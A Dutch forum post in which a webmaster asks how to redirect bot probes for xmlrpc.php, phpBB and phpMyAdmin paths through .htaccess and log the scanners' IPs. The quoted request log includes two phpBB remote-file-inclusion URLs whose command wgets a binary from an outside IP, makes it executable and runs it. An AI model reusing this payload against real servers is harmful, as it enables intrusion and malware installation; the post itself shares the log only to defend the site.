:strip_icc():strip_exif()/u/62639/tm.jpg?f=community)
Ik onderhoud een webpagina waarvoor ik een scriptje heb geschreven (in combinatie met een .htaccess file) dat alle 404s naar me toemailt. (er wordt dan een standaard php-pagina getoond die ook het mailen verzorgd)
Nou krijg ik de laatste tijd steeds vaker een stuk of 20 a 30 mailtjes tegelijk doordat er een bot of worm is langsgeweest die kennelijk op een kwetsbaar script heeft zitten checken. Een voorbeeldje van de pagina's die dan worden opgevraagd:
Nu wilde ik die pagina's opnemen in de htaccess file en redirecten naar een bestaande pagina zodat ik
1) niet dagelijks 30 onzin mailtjes krijg
2) de IPs kan loggen en ze eventueel opnemen in een spamlijst
3) de aanvaller mogelijk kan afschrikken
Ik heb ze dus ook opgenomen in m'n htaccess file en de aanvraag wordt nu dmv een 301 doorgestuurd naar een standaard-pagina en als ik nu bvb /xmlrpc.php in m'n browser opvraag dan krijg ik die standaard-pagina ook daadwerlijk te zien (en geen 404-mail in m'n inbox) waarbij die pagina me verteld dat m'n ip gelogd is (en ook dat werkt).
Nu zit ik echter nog met 2 problemen:
1) ik krijg nog steeds 404 meldingen op bvb /xmlrpc.php. Op één of andere manier wordt hun aanvraag dus niet door de htaccess file afgehandeld
2) ook al zou dat wel lukken ... hoe gaat dat eigenlijk in z'n werking? krijgt de script-kiddie een melding dat de pagina bestaat (omdat er geen 404 is), of krijgt deze alleen een melding als de pagina bestaat én er een lek gevonden is? Want in dat laatste geval zou het afschrikken iig nutteloos zijn.
Nou krijg ik de laatste tijd steeds vaker een stuk of 20 a 30 mailtjes tegelijk doordat er een bot of worm is langsgeweest die kennelijk op een kwetsbaar script heeft zitten checken. Een voorbeeldje van de pagina's die dan worden opgevraagd:
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| /xmlsrv/xmlrpc.php /xmlrpc/xmlrpc.php /xmlrpc.php /wordpress/xmlrpc.php /phpgroupware/xmlrpc.php /drupal/xmlrpc.php /blogs/xmlsrv/xmlrpc.php /blog/xmlsrv/xmlrpc.php /blog/xmlrpc.php /xmlrpc.php /Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| /phpmyadmin/main.php /phpMyAdmin-2.2.6/main.php /phpMyAdmin-2.5.6/main.php /PMA/main.php |
Nu wilde ik die pagina's opnemen in de htaccess file en redirecten naar een bestaande pagina zodat ik
1) niet dagelijks 30 onzin mailtjes krijg
2) de IPs kan loggen en ze eventueel opnemen in een spamlijst
3) de aanvaller mogelijk kan afschrikken
Ik heb ze dus ook opgenomen in m'n htaccess file en de aanvraag wordt nu dmv een 301 doorgestuurd naar een standaard-pagina en als ik nu bvb /xmlrpc.php in m'n browser opvraag dan krijg ik die standaard-pagina ook daadwerlijk te zien (en geen 404-mail in m'n inbox) waarbij die pagina me verteld dat m'n ip gelogd is (en ook dat werkt).
Nu zit ik echter nog met 2 problemen:
1) ik krijg nog steeds 404 meldingen op bvb /xmlrpc.php. Op één of andere manier wordt hun aanvraag dus niet door de htaccess file afgehandeld
2) ook al zou dat wel lukken ... hoe gaat dat eigenlijk in z'n werking? krijgt de script-kiddie een melding dat de pagina bestaat (omdat er geen 404 is), of krijgt deze alleen een melding als de pagina bestaat én er een lek gevonden is? Want in dat laatste geval zou het afschrikken iig nutteloos zijn.
/u/3626/front-kabels.png?f=community)
:strip_icc():strip_exif()/u/10517/nwkoffie.jpg?f=community)
/u/30977/crop654a08a5866a6_cropped.png?f=community)
:strip_exif()/u/70496/glowmouse2.gif?f=community)